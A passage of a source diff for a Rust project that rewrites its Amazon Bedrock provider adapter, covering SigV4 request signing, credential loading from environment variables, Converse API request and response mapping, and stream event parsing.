Process the event. - for ev in parse_bedrock_event(&val, &provider_id, &mut message_started) { - yield ev; - } - } - Err(e) if e.is_eof() => { - // Incomplete — wait for more data. - break; - } - Err(_) => { - // Invalid JSON at this position — skip one byte and retry. - if !buf.is_empty() { - buf.drain(..1); - } else { - break; - } - } - } - } - } - - // Drain any remaining complete JSON in the buffer. - loop { - let start = match buf.iter().position(|&b| b == b'{') { - Some(p) => p, - None => break, - }; - buf.drain(..start); - match serde_json::from_slice::(&buf) { - Ok(val) => { - let consumed = serde_json::to_vec(&val) - .map(|v| v.len()) - .unwrap_or(buf.len()); - buf.drain(..consumed); - for ev in parse_bedrock_event(&val, &provider_id, &mut message_started) { - yield ev; - } - } - Err(_) => break, - } - } - - if message_started { - yield Ok(StreamEvent::MessageStop); - } - }; - - Ok(Box::pin(s)) - } - - async fn list_models(&self) -> Result, ProviderError> { - Ok(vec![ - ModelInfo { - id: ModelId::new("anthropic.claude-opus-4-6"), - provider_id: self.id.clone(), - name: "Claude Opus 4.6 (Bedrock)".to_string(), - context_window: 200_000, - max_output_tokens: 32_000, - }, - ModelInfo { - id: ModelId::new("anthropic.claude-sonnet-4-6"), - provider_id: self.id.clone(), - name: "Claude Sonnet 4.6 (Bedrock)".to_string(), - context_window: 200_000, - max_output_tokens: 16_000, - }, - ModelInfo { - id: ModelId::new("anthropic.claude-haiku-4-5-20251001"), - provider_id: self.id.clone(), - name: "Claude Haiku 4.5 (Bedrock)".to_string(), - context_window: 200_000, - max_output_tokens: 8_192, - }, - ]) - } - - async fn health_check(&self) -> Result { - // Lightweight check: GET the list-foundation-models endpoint. - let url = format!( - "https://bedrock.{}.amazonaws.com/foundation-models", - self.region - ); - let now = chrono::Utc::now(); - // For health check, sign an empty GET body. - let auth_headers = self.sign_request("GET", &url, "", &now); - - let mut req_builder = self.http_client.get(&url); - for (k, v) in &auth_headers { - req_builder = req_builder.header(k.as_str(), v.as_str()); - } - - let resp = req_builder.send().await; - match resp { - Ok(r) if r.status().is_success() => Ok(ProviderStatus::Healthy), - Ok(r) if r.status().as_u16() == 401 || r.status().as_u16() == 403 => { - Ok(ProviderStatus::Unavailable { - reason: "authentication failed".to_string(), - }) - } - Ok(r) => Ok(ProviderStatus::Degraded { - reason: format!("foundation-models returned {}", r.status()), - }), - Err(e) => Ok(ProviderStatus::Unavailable { - reason: e.to_string(), - }), - } - } - - fn capabilities(&self) -> ProviderCapabilities { - ProviderCapabilities { - streaming: true, - tool_calling: true, - thinking: true, - image_input: true, - pdf_input: true, - audio_input: false, - video_input: false, - caching: true, - structured_output: false, - system_prompt_style: SystemPromptStyle::TopLevel, - } - } -} - -// --------------------------------------------------------------------------- -// Bedrock event parsing helper (free function so it can be used in stream!) -// --------------------------------------------------------------------------- - -fn parse_bedrock_event( - val: &Value, - provider_id: &ProviderId, - message_started: &mut bool, -) -> Vec> { - let mut events = Vec::new(); - - // Bedrock Converse streaming events come in several shapes. - // We check for the most common ones: - - // messageStart - if let Some(msg_start) = val.get("messageStart") { - let role = msg_start - .get("role") - .and_then(|v| v.as_str()) - .unwrap_or("assistant"); - let _ = role; - if !*message_started { - events.push(Ok(StreamEvent::MessageStart { - id: uuid::Uuid::new_v4().to_string(), - model: String::new(), - usage: UsageInfo::default(), - })); - *message_started = true; - } - return events; - } - - // contentBlockStart - if let Some(cb_start) = val.get("contentBlockStart") { - let index = cb_start - .get("contentBlockIndex") - .and_then(|v| v.as_u64()) - .unwrap_or(0) as usize; - if !*message_started { - events.push(Ok(StreamEvent::MessageStart { - id: uuid::Uuid::new_v4().to_string(), - model: String::new(), - usage: UsageInfo::default(), - })); - *message_started = true; - } - let start_val = cb_start.get("start"); - if let Some(tool_use) = start_val.and_then(|s| s.get("toolUse")) { - let id = tool_use - .get("toolUseId") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - let name = tool_use - .get("name") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - events.push(Ok(StreamEvent::ContentBlockStart { - index, - content_block: ContentBlock::ToolUse { - id, - name, - input: json!({}), - }, - })); - } else { - events.push(Ok(StreamEvent::ContentBlockStart { - index, - content_block: ContentBlock::Text { text: String::new() }, - })); - } - return events; - } - - // contentBlockDelta - if let Some(cb_delta) = val.get("contentBlockDelta") { - let index = cb_delta - .get("contentBlockIndex") - .and_then(|v| v.as_u64()) - .unwrap_or(0) as usize; - if !*message_started { - events.push(Ok(StreamEvent::MessageStart { - id: uuid::Uuid::new_v4().to_string(), - model: String::new(), - usage: UsageInfo::default(), - })); - events.push(Ok(StreamEvent::ContentBlockStart { - index: 0, - content_block: ContentBlock::Text { text: String::new() }, - })); - *message_started = true; - } - if let Some(delta) = cb_delta.get("delta") { - if let Some(text) = delta.get("text").and_then(|v| v.as_str()) { - if !text.is_empty() { - events.push(Ok(StreamEvent::TextDelta { - index, - text: text.to_string(), - })); - } - } else if let Some(json_frag) = delta - .get("toolUse") - .and_then(|tu| tu.get("input")) - .and_then(|v| v.as_str()) - { - if !json_frag.is_empty() { - events.push(Ok(StreamEvent::InputJsonDelta { - index, - partial_json: json_frag.to_string(), - })); - } - } - } - return events; - } - - // contentBlockStop - if let Some(cb_stop) = val.get("contentBlockStop") { - let index = cb_stop - .get("contentBlockIndex") - .and_then(|v| v.as_u64()) - .unwrap_or(0) as usize; - events.push(Ok(StreamEvent::ContentBlockStop { index })); - return events; - } - - // messageStop - if let Some(msg_stop) = val.get("messageStop") { - let stop_reason_str = msg_stop - .get("stopReason") - .and_then(|v| v.as_str()) - .unwrap_or("end_turn"); - let stop_reason = match stop_reason_str { - "end_turn" => StopReason::EndTurn, - "max_tokens" => StopReason::MaxTokens, - "tool_use" => StopReason::ToolUse, - "stop_sequence" => StopReason::StopSequence, - other => StopReason::Other(other.to_string()), - }; - events.push(Ok(StreamEvent::MessageDelta { - stop_reason: Some(stop_reason), - usage: None, - })); - events.push(Ok(StreamEvent::MessageStop)); - return events; - } - - // metadata (usage) - if let Some(metadata) = val.get("metadata") { - if let Some(usage_val) = metadata.get("usage") { - let usage = UsageInfo { - input_tokens: usage_val - .get("inputTokens") - .and_then(|v| v.as_u64()) - .unwrap_or(0), - output_tokens: usage_val - .get("outputTokens") - .and_then(|v| v.as_u64()) - .unwrap_or(0), - cache_creation_input_tokens: 0, - cache_read_input_tokens: 0, - }; - events.push(Ok(StreamEvent::MessageDelta { - stop_reason: None, - usage: Some(usage), - })); - } - return events; - } - - // internalServerException / throttlingException - if let Some(err) = val - .get("internalServerException") - .or_else(|| val.get("throttlingException")) - .or_else(|| val.get("modelStreamErrorException")) - .or_else(|| val.get("validationException")) - { - let message = err - .get("message") - .and_then(|v| v.as_str()) - .unwrap_or("Unknown Bedrock error") - .to_string(); - events.push(Err(ProviderError::StreamError { - provider: provider_id.clone(), - message, - partial_response: None, - })); - } - - events -} +// providers/bedrock.rs — Amazon Bedrock provider adapter. +// +// Uses the Bedrock Converse Streaming API which accepts a unified message +// format similar to Anthropic's, making it straightforward to map from +// our internal ProviderRequest. +// +// Endpoint: +// POST https://bedrock-runtime.{region}.amazonaws.com/model/{model_id}/converse-stream +// +// Auth: +// - If AWS_BEARER_TOKEN_BEDROCK is set: Authorization: Bearer +// - Otherwise: AWS SigV4 signed request using access key + secret +// +// Only Claude models on Bedrock are officially supported by this adapter. + +use std::pin::Pin; + +use async_stream::stream; +use async_trait::async_trait; +use claurst_core::provider_id::{ModelId, ProviderId}; +use claurst_core::types::{ContentBlock, MessageContent, Role, ToolResultContent, UsageInfo}; +use futures::Stream; +use serde_json::{json, Value}; +use tracing::debug; + +use crate::error_handling::parse_error_response; +use crate::provider::{LlmProvider, ModelInfo}; +use crate::provider_error::ProviderError; +use crate::provider_types::{ + ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StopReason, + StreamEvent, SystemPrompt, SystemPromptStyle, +}; + +use super::message_normalization::remove_empty_messages; +use super::request_options::merge_bedrock_options; + +// --------------------------------------------------------------------------- +// BedrockProvider +// --------------------------------------------------------------------------- + +pub struct BedrockProvider { + id: ProviderId, + region: String, + http_client: reqwest::Client, + access_key_id: Option, + secret_access_key: Option, + session_token: Option, + bearer_token: Option, +} + +impl BedrockProvider { + pub fn from_env() -> Option { + let region = std::env::var("AWS_REGION") + .or_else(|_| std::env::var("AWS_DEFAULT_REGION")) + .unwrap_or_else(|_| "us-east-1".to_string()); + + let http_client = reqwest::Client::builder() + .timeout(std::time::Duration::from_secs(600)) + .build() + .expect("failed to build reqwest client"); + + // Bearer token takes priority over SigV4 credentials. + if let Ok(token) = std::env::var("AWS_BEARER_TOKEN_BEDROCK") { + return Some(Self { + id: ProviderId::new(ProviderId::AMAZON_BEDROCK), + region, + http_client, + access_key_id: None, + secret_access_key: None, + session_token: None, + bearer_token: Some(token), + }); + } + + // Standard SigV4 credentials. + let key = std::env::var("AWS_ACCESS_KEY_ID").ok()?; + let secret = std::env::var("AWS_SECRET_ACCESS_KEY").ok()?; + let session = std::env::var("AWS_SESSION_TOKEN").ok(); + + Some(Self { + id: ProviderId::new(ProviderId::AMAZON_BEDROCK), + region, + http_client, + access_key_id: Some(key), + secret_access_key: Some(secret), + session_token: session, + bearer_token: None, + }) + } + + /// Add a regional cross-inference prefix for models that support it. + fn model_id_with_prefix(&self, model: &str) -> String { + // Skip if already has a dot-separated prefix (e.g. "us.anthropic.claude-...") + if model.contains('.') { + return model.to_string(); + } + let region = &self.region; + if region.starts_with("us-") && !region.contains("gov") { + if model.contains("claude") || model.contains("nova") { + return format!("us.{}", model); + } + } else if region.starts_with("eu-") && model.contains("claude") { + return format!("eu.{}", model); + } + model.to_string() + } + + fn endpoint_url(&self, model_id: &str) -> String { + format!( + "https://bedrock-runtime.{}.amazonaws.com/model/{}/converse-stream", + self.region, + urlencoding::encode(model_id) + ) + } + + // ----------------------------------------------------------------------- + // AWS SigV4 signing + // ----------------------------------------------------------------------- + + fn sign_request( + &self, + method: &str, + url_str: &str, + body: &str, + date: &chrono::DateTime, + ) -> std::collections::HashMap { + use hmac::{Hmac, Mac}; + use sha2::{Digest, Sha256}; + + type HmacSha256 = Hmac; + + let mut headers = std::collections::HashMap::new(); + + // If we have a bearer token, skip SigV4. + if let Some(ref token) = self.bearer_token { + headers.insert("Authorization".to_string(), format!("Bearer {}", token)); + return headers; + } + + let access_key = match &self.access_key_id { + Some(k) => k.clone(), + None => return headers, + }; + let secret_key = match &self.secret_access_key { + Some(s) => s.clone(), + None => return headers, + }; + + let date_str = date.format("%Y%m%d").to_string(); + let datetime_str = date.format("%Y%m%dT%H%M%SZ").to_string(); + let service = "bedrock"; + let region = &self.region; + + // Parse path and query from URL. + let parsed = url::Url::parse(url_str).unwrap_or_else(|_| { + url::Url::parse("https://bedrock-runtime.us-east-1.amazonaws.com/").unwrap() + }); + let canonical_uri = { + let p = parsed.path(); + if p.is_empty() { + "/".to_string() + } else { + p.to_string() + } + }; + let canonical_query = parsed.query().unwrap_or("").to_string(); + + // Body hash. + let body_hash = hex::encode(Sha256::digest(body.as_bytes())); + + // Canonical headers (must be sorted, lowercased). + let host = parsed.host_str().unwrap_or_default().to_string(); + let content_type = "application/json"; + + // Build canonical headers string and signed headers list. + // Include: content-type, host, x-amz-content-sha256, x-amz-date, + // and optionally x-amz-security-token. + let mut canonical_headers = format!( + "content-type:{}\nhost:{}\nx-amz-content-sha256:{}\nx-amz-date:{}\n", + content_type, host, body_hash, datetime_str + ); + let mut signed_headers = "content-type;host;x-amz-content-sha256;x-amz-date".to_string(); + + if let Some(ref tok) = self.session_token { + canonical_headers.push_str(&format!("x-amz-security-token:{}\n", tok)); + signed_headers.push_str(";x-amz-security-token"); + } + + // Canonical request. + let canonical_request = format!( + "{}\n{}\n{}\n{}\n{}\n{}", + method, canonical_uri, canonical_query, canonical_headers, signed_headers, body_hash + ); + + // String to sign. + let credential_scope = format!("{}/{}/{}/aws4_request", date_str, region, service); + let canonical_request_hash = hex::encode(Sha256::digest(canonical_request.as_bytes())); + let string_to_sign = format!( + "AWS4-HMAC-SHA256\n{}\n{}\n{}", + datetime_str, credential_scope, canonical_request_hash + ); + + // Signing key: HMAC-SHA256 chain. + let sign_key = { + let k_date = { + let mut mac = HmacSha256::new_from_slice(format!("AWS4{}", secret_key).as_bytes()) + .expect("HMAC init failed"); + mac.update(date_str.as_bytes()); + mac.finalize().into_bytes() + }; + let k_region = { + let mut mac = HmacSha256::new_from_slice(&k_date).expect("HMAC init failed"); + mac.update(region.as_bytes()); + mac.finalize().into_bytes() + }; + let k_service = { + let mut mac = HmacSha256::new_from_slice(&k_region).expect("HMAC init failed"); + mac.update(service.as_bytes()); + mac.finalize().into_bytes() + }; + { + let mut mac = HmacSha256::new_from_slice(&k_service).expect("HMAC init failed"); + mac.update(b"aws4_request"); + mac.finalize().into_bytes() + } + }; + + let signature = { + let mut mac = HmacSha256::new_from_slice(&sign_key).expect("HMAC init failed"); + mac.update(string_to_sign.as_bytes()); + hex::encode(mac.finalize().into_bytes()) + }; + + let authorization = format!( + "AWS4-HMAC-SHA256 Credential={}/{}, SignedHeaders={}, Signature={}", + access_key, credential_scope, signed_headers, signature + ); + + headers.insert("Authorization".to_string(), authorization); + headers.insert("x-amz-date".to_string(), datetime_str); + headers.insert("x-amz-content-sha256".to_string(), body_hash); + if let Some(ref tok) = self.session_token { + headers.insert("x-amz-security-token".to_string(), tok.clone()); + } + + headers + } + + // ----------------------------------------------------------------------- + // Request body builders + // ----------------------------------------------------------------------- + + fn build_converse_body(request: &ProviderRequest) -> Value { + let messages = Self::build_converse_messages(request); + let mut body = json!({ + "messages": messages, + "inferenceConfig": { + "maxTokens": request.max_tokens, + "temperature": request.temperature.unwrap_or(0.7), + "topP": request.top_p.unwrap_or(0.9), + "stopSequences": request.stop_sequences, + } + }); + + // System prompt. + if let Some(sys) = &request.system_prompt { + let sys_text = match sys { + SystemPrompt::Text(t) => t.clone(), + SystemPrompt::Blocks(blocks) => blocks + .iter() + .map(|b| b.text.clone()) + .collect::>() + .join("\n"), + }; + body["system"] = json!([{ "text": sys_text }]); + } + + // Tool definitions. + if !request.tools.is_empty() { + let tool_specs: Vec = request + .tools + .iter() + .map(|td| { + json!({ + "toolSpec": { + "name": td.name, + "description": td.description, + "inputSchema": { + "json": td.input_schema + } + } + }) + }) + .collect(); + body["toolConfig"] = json!({ "tools": tool_specs }); + } + + if let Some(thinking) = &request.thinking { + body["reasoningConfig"] = json!({ + "type": "enabled", + "budgetTokens": thinking.budget_tokens, + }); + } + + merge_bedrock_options(&mut body, &request.provider_options); + + body + } + + fn build_converse_messages(request: &ProviderRequest) -> Vec { + remove_empty_messages(&request.messages) + .iter() + .map(|msg| { + let role = match msg.role { + Role::User => "user", + Role::Assistant => "assistant", + }; + let content = Self::message_content_to_converse(&msg.content); + json!({ "role": role, "content": content }) + }) + .collect() + } + + fn message_content_to_converse(content: &MessageContent) -> Vec { + match content { + MessageContent::Text(t) => vec![json!({ "text": t })], + MessageContent::Blocks(blocks) => blocks + .iter() + .filter_map(Self::content_block_to_converse) + .collect(), + } + } + + fn content_block_to_converse(block: &ContentBlock) -> Option { + match block { + ContentBlock::Text { text } => Some(json!({ "text": text })), + ContentBlock::Image { source } => { + // Bedrock Converse image format. + let media_type = source + .media_type + .as_deref() + .unwrap_or("image/png") + .replace("image/", ""); + if let Some(data) = &source.data { + Some(json!({ + "image": { + "format": media_type, + "source": { + "bytes": data + } + } + })) + } else if let Some(url) = &source.url { + // Bedrock doesn't support URL images natively; skip. + debug!("Bedrock does not support URL images: {}", url); + None + } else { + None + } + } + ContentBlock::ToolUse { id, name, input } => Some(json!({ + "toolUse": { + "toolUseId": id, + "name": name, + "input": input + } + })), + ContentBlock::ToolResult { + tool_use_id, + content, + is_error, + } => { + let result_content = match content { + ToolResultContent::Text(t) => vec![json!({ "text": t })], + ToolResultContent::Blocks(inner) => inner + .iter() + .filter_map(Self::content_block_to_converse) + .collect(), + }; + let status = if is_error.unwrap_or(false) { + "error" + } else { + "success" + }; + Some(json!({ + "toolResult": { + "toolUseId": tool_use_id, + "content": result_content, + "status": status + } + })) + } + ContentBlock::Thinking { thinking, .. } => Some(json!({ "text": thinking })), + _ => None, + } + } + + // ----------------------------------------------------------------------- + // HTTP helpers + // ----------------------------------------------------------------------- + + fn map_http_error(&self, status: u16, body: &str) -> ProviderError { + parse_error_response(status, body, &self.id) + } + + // ----------------------------------------------------------------------- + // Send helpers + // ----------------------------------------------------------------------- + + async fn send_streaming( + &self, + request: &ProviderRequest, + ) -> Result { + let bedrock_model = self.model_id_with_prefix(&request.model); + let url = self.endpoint_url(&bedrock_model); + + let body = Self::build_converse_body(request); + let body_str = serde_json::to_string(&body).unwrap_or_default(); + + let now = chrono::Utc::now(); + let auth_headers = self.sign_request("POST", &url, &body_str, &now); + + let mut req_builder = self + .http_client + .post(&url) + .header("Content-Type", "application/json") + .header("Accept", "application/vnd.amazon.eventstream"); + + for (k, v) in &auth_headers { + req_builder = req_builder.header(k.as_str(), v.as_str()); + } + + let resp = req_builder + .body(body_str) + .send() + .await + .map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("HTTP request failed: {}", e), + status: None, + body: None, + })?; + + let status = resp.status().as_u16(); + if !(200..300).contains(&(status as usize)) { + let text = resp.text().await.unwrap_or_default(); + return Err(self.map_http_error(status, &text)); + } + + Ok(resp) + } + + async fn send_non_streaming( + &self, + request: &ProviderRequest, + ) -> Result { + let bedrock_model = self.model_id_with_prefix(&request.model); + // Non-streaming uses /converse (not /converse-stream) + let url = format!( + "https://bedrock-runtime.{}.amazonaws.com/model/{}/converse", + self.region, + urlencoding::encode(&bedrock_model) + ); + + let body = Self::build_converse_body(request); + let body_str = serde_json::to_string(&body).unwrap_or_default(); + + let now = chrono::Utc::now(); + let auth_headers = self.sign_request("POST", &url, &body_str, &now); + + let mut req_builder = self + .http_client + .post(&url) + .header("Content-Type", "application/json"); + + for (k, v) in &auth_headers { + req_builder = req_builder.header(k.as_str(), v.as_str()); + } + + let resp = req_builder + .body(body_str) + .send() + .await + .map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("HTTP request failed: {}", e), + status: None, + body: None, + })?; + + let status = resp.status().as_u16(); + let text = resp.text().await.map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to read response body: {}", e), + status: Some(status), + body: None, + })?; + + if !(200..300).contains(&(status as usize)) { + return Err(self.map_http_error(status, &text)); + } + + let json_val: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to parse response JSON: {}", e), + status: Some(status), + body: Some(text.clone()), + })?; + + Self::parse_converse_response(&json_val, &self.id) + } + + fn parse_converse_response( + json: &Value, + provider_id: &ProviderId, + ) -> Result { + // Bedrock Converse non-streaming response shape: + // { "output": { "message": { "role": "assistant", "content": [...] } }, + // "stopReason": "end_turn", + // "usage": { "inputTokens": N, "outputTokens": M } } + + let message = json + .get("output") + .and_then(|o| o.get("message")) + .ok_or_else(|| ProviderError::Other { + provider: provider_id.clone(), + message: "No output.message in Bedrock response".to_string(), + status: None, + body: None, + })?; + + let content_blocks = + Self::parse_converse_content(message.get("content").and_then(|c| c.as_array())); + + let stop_reason_str = json + .get("stopReason") + .and_then(|v| v.as_str()) + .unwrap_or("end_turn"); + let stop_reason = Self::map_stop_reason(stop_reason_str); + + let usage = Self::parse_converse_usage(json.get("usage")); + + Ok(ProviderResponse { + id: uuid::Uuid::new_v4().to_string(), + content: content_blocks, + stop_reason, + usage, + model: json + .get("model") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(), + }) + } + + fn parse_converse_content(content: Option<&Vec>) -> Vec { + let blocks = match content { + Some(b) => b, + None => return vec![], + }; + + blocks + .iter() + .filter_map(|b| { + if let Some(text) = b.get("text").and_then(|v| v.as_str()) { + return Some(ContentBlock::Text { + text: text.to_string(), + }); + } + if let Some(tu) = b.get("toolUse") { + let id = tu + .get("toolUseId") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + let name = tu + .get("name") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + let input = tu.get("input").cloned().unwrap_or(json!({})); + return Some(ContentBlock::ToolUse { id, name, input }); + } + None + }) + .collect() + } + + fn map_stop_reason(reason: &str) -> StopReason { + match reason { + "end_turn" => StopReason::EndTurn, + "max_tokens" => StopReason::MaxTokens, + "tool_use" => StopReason::ToolUse, + "stop_sequence" => StopReason::StopSequence, + "content_filtered" => StopReason::ContentFiltered, + other => StopReason::Other(other.to_string()), + } + } + + fn parse_converse_usage(usage: Option<&Value>) -> UsageInfo { + let u = match usage { + Some(v) => v, + None => return UsageInfo::default(), + }; + UsageInfo { + input_tokens: u.get("inputTokens").and_then(|v| v.as_u64()).unwrap_or(0), + output_tokens: u.get("outputTokens").and_then(|v| v.as_u64()).unwrap_or(0), + cache_creation_input_tokens: 0, + cache_read_input_tokens: 0, + } + } +} + +// --------------------------------------------------------------------------- +// LlmProvider impl +// --------------------------------------------------------------------------- + +#[async_trait] +impl LlmProvider for BedrockProvider { + fn id(&self) -> &ProviderId { + &self.id + } + + fn name(&self) -> &str { + "Amazon Bedrock" + } + + async fn create_message( + &self, + request: ProviderRequest, + ) -> Result { + self.send_non_streaming(&request).await + } + + async fn create_message_stream( + &self, + request: ProviderRequest, + ) -> Result> + Send>>, ProviderError> + { + let resp = self.send_streaming(&request).await?; + let provider_id = self.id.clone(); + + // Bedrock Converse streaming uses AWS EventStream binary framing. + // For simplicity we parse the JSON chunks that appear within the + // event payload bytes. Each event is a binary-framed blob containing + // a JSON payload under the ":event-type" header. + // + // We fall back to text-based JSON parsing by scanning for JSON objects + // in the raw bytes, which works reliably for the common text delta events. + let s = stream! { + use futures::StreamExt; + + let mut byte_stream = resp.bytes_stream(); + let mut buf: Vec = Vec::new(); + let mut message_started = false; + + while let Some(chunk_result) = byte_stream.next().await { + let chunk = match chunk_result { + Ok(c) => c, + Err(e) => { + yield Err(ProviderError::StreamError { + provider: provider_id.clone(), + message: format!("Stream read error: {}", e), + partial_response: None, + }); + return; + } + }; + + buf.extend_from_slice(&chunk); + + // Extract all complete JSON objects from the buffer. + // The AWS event-stream format prefixes each event with a + // 12-byte prelude (total-len + headers-len + crc32) followed + // by variable-length headers and then a JSON payload. Rather + // than fully parsing the binary framing we scan for JSON + // object boundaries which is sufficient for the text events. + loop { + // Find the first '{' in the buffer. + let start = match buf.iter().position(|&b| b == b'{') { + Some(p) => p, + None => { + buf.clear(); + break; + } + }; + + // Drain everything before the opening brace. + buf.drain(..start); + + // Try to parse a complete JSON object. + match serde_json::from_slice::(&buf) { + Ok(val) => { + let consumed = serde_json::to_vec(&val) + .map(|v| v.len()) + .unwrap_or(buf.len()); + buf.drain(..consumed); + // Process the event. + for ev in parse_bedrock_event(&val, &provider_id, &mut message_started) { + yield ev; + } + } + Err(e) if e.is_eof() => { + // Incomplete — wait for more data. + break; + } + Err(_) => { + // Invalid JSON at this position — skip one byte and retry. + if !buf.is_empty() { + buf.drain(..1); + } else { + break; + } + } + } + } + } + + // Drain any remaining complete JSON in the buffer. + while let Some(start) = buf.iter().position(|&b| b == b'{') { + buf.drain(..start); + match serde_json::from_slice::(&buf) { + Ok(val) => { + let consumed = serde_json::to_vec(&val) + .map(|v| v.len()) + .unwrap_or(buf.len()); + buf.drain(..consumed); + for ev in parse_bedrock_event(&val, &provider_id, &mut message_started) { + yield ev; + } + } + Err(_) => break, + } + } + + if message_started { + yield Ok(StreamEvent::MessageStop); + } + }; + + Ok(Box::pin(s)) + } + + async fn list_models(&self) -> Result, ProviderError> { + Ok(vec![ + ModelInfo { + id: ModelId::new("anthropic.claude-opus-4-6"), + provider_id: self.id.clone(), + name: "Claude Opus 4.6 (Bedrock)".to_string(), + context_window: 200_000, + max_output_tokens: 32_000, + }, + ModelInfo { + id: ModelId::new("anthropic.claude-sonnet-4-6"), + provider_id: self.id.clone(), + name: "Claude Sonnet 4.6 (Bedrock)".to_string(), + context_window: 200_000, + max_output_tokens: 16_000, + }, + ModelInfo { + id: ModelId::new("anthropic.claude-haiku-4-5-20251001"), + provider_id: self.id.clone(), + name: "Claude Haiku 4.5 (Bedrock)".to_string(), + context_window: 200_000, + max_output_tokens: 8_192, + }, + ]) + } + + async fn health_check(&self) -> Result { + // Lightweight check: GET the list-foundation-models endpoint. + let url = format!( + "https://bedrock.{}.amazonaws.com/foundation-models", + self.region + ); + let now = chrono::Utc::now(); + // For health check, sign an empty GET body. + let auth_headers = self.sign_request("GET", &url, "", &now); + + let mut req_builder = self.http_client.get(&url); + for (k, v) in &auth_headers { + req_builder = req_builder.header(k.as_str(), v.as_str()); + } + + let resp = req_builder.send().await; + match resp { + Ok(r) if r.status().is_success() => Ok(ProviderStatus::Healthy), + Ok(r) if r.status().as_u16() == 401 || r.status().as_u16() == 403 => { + Ok(ProviderStatus::Unavailable { + reason: "authentication failed".to_string(), + }) + } + Ok(r) => Ok(ProviderStatus::Degraded { + reason: format!("foundation-models returned {}", r.status()), + }), + Err(e) => Ok(ProviderStatus::Unavailable { + reason: e.to_string(), + }), + } + } + + fn capabilities(&self) -> ProviderCapabilities { + ProviderCapabilities { + streaming: true, + tool_calling: true, + thinking: true, + image_input: true, + pdf_input: true, + audio_input: false, + video_input: false, + caching: true, + structured_output: false, + system_prompt_style: SystemPromptStyle::TopLevel, + } + } +} + +// --------------------------------------------------------------------------- +// Bedrock event parsing helper (free function so it can be used in stream!) +// --------------------------------------------------------------------------- + +fn parse_bedrock_event( + val: &Value, + provider_id: &ProviderId, + message_started: &mut bool, +) -> Vec> { + let mut events = Vec::new(); + + // Bedrock Converse streaming events come in several shapes. + // We check for the most common ones: + + // messageStart + if let Some(msg_start) = val.get("messageStart") { + let role = msg_start + .get("role") + .and_then(|v| v.as_str()) + .unwrap_or("assistant"); + let _ = role; + if !*message_started { + events.push(Ok(StreamEvent::MessageStart { + id: uuid::Uuid::new_v4().to_string(), + model: String::new(), + usage: UsageInfo::default(), + })); + *message_started = true; + } + return events; + } + + // contentBlockStart + if let Some(cb_start) = val.get("contentBlockStart") { + let index = cb_start + .get("contentBlockIndex") + .and_then(|v| v.as_u64()) + .unwrap_or(0) as usize; + if !*message_started { + events.push(Ok(StreamEvent::MessageStart { + id: uuid::Uuid::new_v4().to_string(), + model: String::new(), + usage: UsageInfo::default(), + })); + *message_started = true; + } + let start_val = cb_start.get("start"); + if let Some(tool_use) = start_val.and_then(|s| s.get("toolUse")) { + let id = tool_use + .get("toolUseId") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + let name = tool_use + .get("name") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + events.push(Ok(StreamEvent::ContentBlockStart { + index, + content_block: ContentBlock::ToolUse { + id, + name, + input: json!({}), + }, + })); + } else { + events.push(Ok(StreamEvent::ContentBlockStart { + index, + content_block: ContentBlock::Text { + text: String::new(), + }, + })); + } + return events; + } + + // contentBlockDelta + if let Some(cb_delta) = val.get("contentBlockDelta") { + let index = cb_delta + .get("contentBlockIndex") + .and_then(|v| v.as_u64()) + .unwrap_or(0) as usize; + if !*message_started { + events.push(Ok(StreamEvent::MessageStart { + id: uuid::Uuid::new_v4().to_string(), + model: String::new(), + usage: UsageInfo::default(), + })); + events.push(Ok(StreamEvent::ContentBlockStart { + index: 0, + content_block: ContentBlock::Text { + text: String::new(), + }, + })); + *message_started = true; + } + if let Some(delta) = cb_delta.get("delta") { + if let Some(text) = delta.get("text").and_then(|v| v.as_str()) { + if !text.is_empty() { + events.push(Ok(StreamEvent::TextDelta { + index, + text: text.to_string(), + })); + } + } else if let Some(json_frag) = delta + .get("toolUse") + .and_then(|tu| tu.get("input")) + .and_then(|v| v.as_str()) + { + if !json_frag.is_empty() { + events.push(Ok(StreamEvent::InputJsonDelta { + index, + partial_json: json_frag.to_string(), + })); + } + } + } + return events; + } + + // contentBlockStop + if let Some(cb_stop) = val.get("contentBlockStop") { + let index = cb_stop + .get("contentBlockIndex") + .and_then(|v| v.as_u64()) + .unwrap_or(0) as usize; + events.push(Ok(StreamEvent::ContentBlockStop { index })); + return events; + } + + // messageStop + if let Some(msg_stop) = val.get("messageStop") { + let stop_reason_str = msg_stop + .get("stopReason") + .and_then(|v| v.as_str()) + .unwrap_or("end_turn"); + let stop_reason = match stop_reason_str { + "end_turn" => StopReason::EndTurn, + "max_tokens" => StopReason::MaxTokens, + "tool_use" => StopReason::ToolUse, + "stop_sequence" => StopReason::StopSequence, + other => StopReason::Other(other.to_string()), + }; + events.push(Ok(StreamEvent::MessageDelta { + stop_reason: Some(stop_reason), + usage: None, + })); + events.push(Ok(StreamEvent::MessageStop)); + return events; + } + + // metadata (usage) + if let Some(metadata) = val.get("metadata") { + if let Some(usage_val) = metadata.get("usage") { + let usage = UsageInfo { + input_tokens: usage_val + .get("inputTokens") + .and_then(|v| v.as_u64()) + .unwrap_or(0), + output_tokens: usage_val + .get("outputTokens") + .and_then(|v| v.as_u64()) + .unwrap_or(0), + cache_creation_input_tokens: 0, + cache_read_input_tokens: 0, + }; + events.push(Ok(StreamEvent::MessageDelta { + stop_reason: None, + usage: Some(usage), + })); + } + return events; + } + + // internalServerException / throttlingException + if let Some(err) = val + .get("internalServerException") + .or_else(|| val.get("throttlingException")) + .or_else(|| val.get("modelStreamErrorException")) + .or_else(|| val.get("validationException")) + { + let message = err + .get("message") + .and_then(|v| v.as_str()) + .unwrap_or("Unknown Bedrock error") + .to_string(); + events.push(Err(ProviderError::StreamError { + provider: provider_id.clone(), + message, + partial_response: None, + })); + } + + events +} diff --git a/src-rust/crates/api/src/providers/codex.rs b/src-rust/crates/api/src/providers/codex.rs index 8047c93..0602d1b 100644 --- 